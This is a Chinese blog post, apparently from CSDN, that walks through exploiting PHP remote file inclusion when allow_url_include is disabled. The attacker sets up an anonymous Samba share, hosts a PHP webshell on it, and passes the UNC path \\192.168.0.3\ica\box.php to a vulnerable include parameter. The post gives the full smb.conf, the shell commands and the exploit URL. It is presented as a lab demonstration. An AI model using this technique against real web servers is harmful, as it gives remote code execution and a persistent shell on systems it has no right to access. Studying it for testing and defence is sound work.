php 怎么远程包含,利用PHP应用程序中的远程文件包含(RFI)并绕过远程URL包含限制...

最新推荐文章于 2022-02-28 15:36:58 发布
最新推荐文章于 2022-02-28 15:36:58 发布
阅读量602 收藏
点赞数
文章标签: php 怎么远程包含

前言

文章讲诉了如何绕过远程URL包含限制。在PHP开发环境php.ini配置文件里”,allow_url_include“为“off”的情况下,不允许PHP加载远程HTTP或FTP url包含远程文件。但是使用SMB依旧可以加载。

攻击思路

攻击者需要配置SMB服务器,启用匿名浏览访问。利用有漏洞的PHP代码从SMB共享里访问PHP Webshell。

配置php.ini文件禁用 "allow_url_fopen" 和 "allow_url_include" 。

配置SMB服务器的匿名读访问权

利用有漏洞的PHP程序访问SMB

PHP环境设置

在PHP.ini文件里把 "allow_url_fopen" 和 "allow_url_include" 设为 "Off"。

当前配置PHP版本为“5.5.11”:

4c1650d8877ba481faf4ea239c016018.png

确定PHP不允许远程文件包含

93a9ecd1c3a920833fe1f2728ccc5e8e.png

试图从远程主机包含PHP Web shell时,应用程序抛出错误并且没有发生RFI。

配置匿名读访问SAMBA服务器(Linux)

使用下面提到的命令安装SAMBA服务器:

创建SMB共享目录(/var/www/html/pub/)

mkdir /var/www/html/pub/

00d31dfdbfed9e6ea3cea28482a5f99f.png

配置SMB共享目录的权限:

chmod 0555 /var/www/html/pub/

chown -R nobody:nogroup /var/www/html/pub/

b984302331fdea4eaf4593ae8f7d3ccc.png

运行以下提到的命令删除SAMBA服务器配置文件的默认内容

echo > /etc/samba/smb.conf

将下面提到的内容放在'/etc/samba/smb.conf'文件中

[global]

workgroup = WORKGROUP

server string = Samba Server %v

netbios name = indishell-lab

security = user

map to guest = bad user

name resolve order = bcast host

dns proxy = no

bind interfaces only = yes

[ica]

path = /var/www/html/pub

writable = no

guest ok = yes

guest only = yes

read only = yes

directory mode = 0555

force user = nobody

重新启动SAMBA服务器

service smbd restart

成功重新启动SAMBA服务器后,尝试访问SMB共享并确保SAMBA服务器不需要凭据验证。

\\192.168.0.3\

5e502c4a471917ceba1078c43b992347.png

在SMB共享中托管PHP Web shell

在目录'/var/www/html/pub'中托管PHP shell

347ca2384509b342faf510d09f8055bb.png

利用Windows Explorer打开SMB访问 Win+R直接访问。

\\192.168.0.3\ica\

b4b107ddbebdcd6bb5ba153add1d2e3e.png

攻击文件包含漏洞参数

利用SMB的php webshell路径传入文件包含漏洞的参数里。

http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.php

SMB共享中获取Web shell并在应用程序服务器上顺利执行PHP代码,绕过了远程文件包含的限制。

c3dedfbc486dac33e29f0c88c060b280.png

东方远
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用SMB共享来绕过php远程文件包含限制执行RFI利用
10-16
我们将绕过php远程文件包含限制,并执行RFI利用,即使PHP环境被配置为不包含来自远程HTTP/FTP URL的文件。对此文感兴趣的朋友跟随小编一起看看吧
本地包含远程包含
qq_68233961的博客
10-14 467
本地包含远程包含漏洞
php文件包含
m0_64361111的博客
02-28 1321
概念 把可重复使用的函数写入到单个文件,在使用该函数时,直接调用此文件,无需再次编写函数。这一调用文件的过程被称为包含。 原理 文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP WebApplication居多,而在JSP、ASP、ASP.NET程序却非常少,这是有些语言设计的弊端。在PHP经常出现文件包含漏洞,但并不意味着其他语言不存在。泄露甚
php引入远程文件,php 调用远程url的六种方法小结(修正版)
weixin_31488273的博客
03-10 630
示例代码1: 用file_get_contents 以get方式获取内容$url='http://www.baidu.com/';$html=file_get_contents($url);//print_r($http_response_header);echo($html);echo("");print_r($http_response_header);示例代码2: 用fopen打开url, ...
PHP打开或包含远程文件时要注意的问题
打杂人
12-10 7288
1.如果要用fopen打开远程文件,则此时最好检查一下php.ini的配置选项allow_url_fopen,如果为on则可以打开,否则不能打开 if (ini_get('allow_url_fopen')) {     //可以打开远程文件 } else {     //不能打开远程文件 } ; Whether to allow the treatment of URLs (l
php include 远程文件路径,php远程文件包含漏洞(一)
weixin_31894867的博客
03-10 827
(服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。涉及到的危险函数:include(),require()和include_once(),require_once()Include:包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。Require:跟incl...
Web应用安全:远程文件包含利用.pptx
06-20
使用远程文件包含(RFI),攻击者可以使web应用程序包含远程文件。对于动态包含外部文件或脚本的web应用程序来说,这是可能的。成功的RFI攻击的潜在web安全后果包括从敏感信息泄露和跨站点脚本(XSS)到远程代码执行,...
react-rfi-log:一个简单的RFI Log应用程序利用react.js和ribs.js
05-07
一个简单的RFI日志应用程序,结合了ribs.js和react.js。 演示([ ] [demo_link]) 安装 使用grunt dev从客户端目录使用npm install Build app检索第三方依赖项 贡献者 罗恩·冈萨雷斯·罗伯([ ] ) 执照 麻省...
导电工程塑料在抗EMI_RFI的设计与应用.pdf
12-14
导电工程塑料在抗EMI_RFI的设计与应用.pdf
元器件应用的Vishay推新型 RFI/EMI 抑制电容器
12-06
Vishay Intertechnology推出两个可实现 RFI/EMI 抑制的新型高可靠性组件系列,从而扩展了其瓷盘电容器范围。VY1 与 VY2 电容器符合 EN132400/IEC 60384 – 14 第二版 ENEC-VDE、UL1414 及 CSA 标准要求,并且可用于...
PHP 网络开发详解之远程文件包含漏洞
10-29
由于PHP支持使用相同的函数(Function)对本地文件和远程文件进行操作。因此,一些恶意用户通过强行使网站上的PHP代码(Code)包含自己的文件来实现执行自己脚本的目的。
PHP远程文件包含RFI)并绕过远程URL包含限制
Ms08067安全实验室
04-06 1603
文章来源|MS08067 公众号粉丝投稿本文作者:VastSky(Ms08067实验室粉丝)前言本文我们讲如何绕过远程URL包含限制。在PHP开发环境php.ini配置文里”allow_u...
PHP用include或require引入远程文件
NEFU_kadia的博客
02-27 652
仅限于引用自己的服务器上的其他站点的文件 在服务器搜索php.ini Ctrl+F搜索allow_url找到这两个文件改为On allow_url_fopen = On allow_url_include = On 重启阿帕奇/nginx
php代码审计【8】本地包含远程包含
司徒荆的博客
06-26 686
本地包含远程包含
php本地文件包含&远程文件包含
think_ycx的专栏
04-07 7692
本地文件包含&远程文件包含
文件包含漏洞
sh0rk的博客
11-24 317
文件包含什么是文件包含利用方法本地文件包含远程文件包含进阶防御 什么是文件包含 顾名思义,打开并包含本地或者远程文件的漏洞 利用方法 本地文件包含 远程文件包含 进阶 LFI with PHPInfo 防御 严格判断包含的参数是否外部可控 路径限制限制包含的文件只能在某一文件夹内,一定要禁止目录跳转字符如"../","..\" 使用白名单!!! ...
远程文件包含shell
WYJ____的博客
08-06 3352
一 预备知识 程序开发人员通常会把可重复使用的函数写到单个文件,在使用某些函数时,直接调用此文件,无须再次编写,这种调用文件的过程称为包含。 实验目的 远程文件包含shell 实验工具 火狐浏览器菜刀软件工具 实验环境 客户机一台(操作系统为Windows Server 2003)服务器一台(操作系统为Windows Server 2003) 实验步骤 1、访问127.0.0...
远程文件包含漏洞
0xcc'Blog
05-12 2681
远程文件包含漏洞时,攻击者可以通过访问外部地址来加载远程代码 在PHP的配置文件php.ini里将allow_url_fopen和allow_url_include设置为ON,include/require等包含函数可以加载远程文件,如果远程文件没经过严格的过滤,导致了执行恶意文件的代码,这就是远程文件包含漏洞。 ...
PHP获取远程文件的几种方式
EwanRenton
07-26 2913
layout: post title: "PHP获取远程文件的几种方式" date: 2016-05-18 14:18:15 +0800 comments: true categories: [php] 接上次的内容,今天结合代码来分析下PHP获取远程文件的几种方式。 fopen 获取本地文件 获取到的资源绑定到一个流上面 file_get_centents 获取一些Get获...
远程文件包含怎么利用,具体一点
最新发布
05-22
远程文件包含(Remote File Inclusion, RFI)是一种Web应用程序攻击技术,利用应用程序动态包含文件的代码漏洞。攻击者可以通过RIF攻击技术,将恶意代码注入网站服务器上,从而导致服务器执行攻击者的代码。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值